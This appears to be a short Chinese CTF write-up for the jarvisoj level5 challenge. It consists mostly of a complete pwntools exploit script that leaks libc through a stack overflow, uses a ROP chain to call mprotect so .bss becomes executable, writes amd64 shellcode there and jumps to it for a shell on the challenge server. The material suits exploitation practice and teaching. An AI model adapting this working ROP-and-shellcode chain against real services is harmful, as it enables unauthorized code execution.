
jarvisoj level5爬坑

本著「紙上得來終覺淺，絕知此事要躬行」的原則，把一個簡單的ROP做了一下。漏洞很明顯，libc也有給出；唯一的限制就是要用mprotect或者mmap。

指令碼調了半天，最後發現是shellcode的問題；這裡的一個坑是shellcraft.sh()要指定目標平臺的架構。沒用過shellcraft模組，連這麼簡單的錯都犯，汗-_-||

from pwn import *

# Exploit script for the jarvisoj level5 challenge (binary ./level3_x64 with
# the provided ./libc-2.19.so). Written for Python 2 pwntools: `print` is a
# statement and payloads are built as plain str.
#
# Overall flow (each stage overflows the same 0x80-byte buffer plus 8 bytes
# of saved rbp, then returns into a ROP chain that ends at start_addr so the
# vulnerable function can be re-entered):
#   1. leak write@got via write@plt       -> compute the libc base
#   2. mprotect(0x600000, 0x1000, 7)      -> make the page holding .bss RWX
#   3. read(0, bss_start, 48)             -> store shellcode in .bss
#   4. return to bss_start                -> run the shellcode
context.log_level='DEBUG'
r=remote('pwn2.jarvisoj.com',9883)
# Local alternative with the challenge libc preloaded (kept disabled).
#r=process('./level3_x64',env={"LD_PRELOAD":"/root/JarvisOJ/level3_x64/libc-2.19.so"})
file=ELF('./level3_x64')
libc=ELF('./libc-2.19.so')
# Hard-coded addresses in the binary (gadgets found with a ROP-gadget tool;
# see the note string below). prsi is "pop rsi ; pop r15 ; ret", hence the
# 8-byte 'c' filler that follows every rsi value in the chains.
prdi=0x4006b3
prsi=0x4006b1
bss_start=0x600A88   # where the shellcode is written in stage 3
start_addr=0x4004F0  # _start-like re-entry point so the overflow can be reused
# Offsets recorded by the author (0x1b8e is libc-relative, resolved below).
''' 0x00000000004006b1 : pop rsi ; pop r15 ; ret 0x0000000000001b8e : pop rdx ; ret '''

# Stage 1: write(1, write@got, rdx) -- rdx is not set by this chain, so the
# call relies on whatever rdx holds at that point; only the first 8 bytes
# of the output are consumed below.
payload1='a'*0x80+'b'*8+p64(prdi)+p64(1)+p64(prsi)+p64(file.got['write'])+'c'*8+p64(file.plt['write'])
payload1+=p64(start_addr)
r.recvuntil('\n')
r.send(payload1)
write_got=u64(r.recv(8))
sleep(1)
# Libc base = leaked write address minus its offset in the provided libc.
libc_base=write_got-libc.sym['write']
mprotect=libc_base+libc.sym['mprotect']
prdx=libc_base+0x1b8e  # "pop rdx ; ret" gadget inside libc
print hex(libc_base)
print hex(mprotect)
print hex(prdx)

# Stage 2: mprotect(0x600000, 0x1000, 7); 7 == PROT_READ|PROT_WRITE|PROT_EXEC,
# and 0x600000 is the page that contains bss_start.
payload2='a'*0x80+'b'*8+p64(prdi)+p64(0x600000)+p64(prsi)+p64(0x1000)+'c'*8+p64(prdx)+p64(7)+p64(mprotect)+p64(start_addr)
r.recvuntil('\n')
r.send(payload2)
sleep(1)
#gdb.attach(r)

# Stage 3: read(0, bss_start, 48), then feed the shellcode as that read's input.
# shellcraft.sh() must be assembled for amd64 explicitly (see the write-up).
payload3='a'*0x80+'b'*8+p64(prdi)+p64(0)+p64(prsi)+p64(bss_start)+'c'*8+p64(prdx)+p64(48)+p64(file.plt['read'])+p64(start_addr)
r.recvuntil('\n')
r.send(payload3)
sleep(1)
r.send(asm(shellcraft.amd64.linux.sh(),arch='amd64'))
#gdb.attach(r)

# Stage 4: overwrite the return address with bss_start to execute the
# shellcode placed there in stage 3.
payload4='a'*0x80+'b'*8+p64(bss_start)
r.recvuntil('\n')
r.send(payload4)
r.interactive()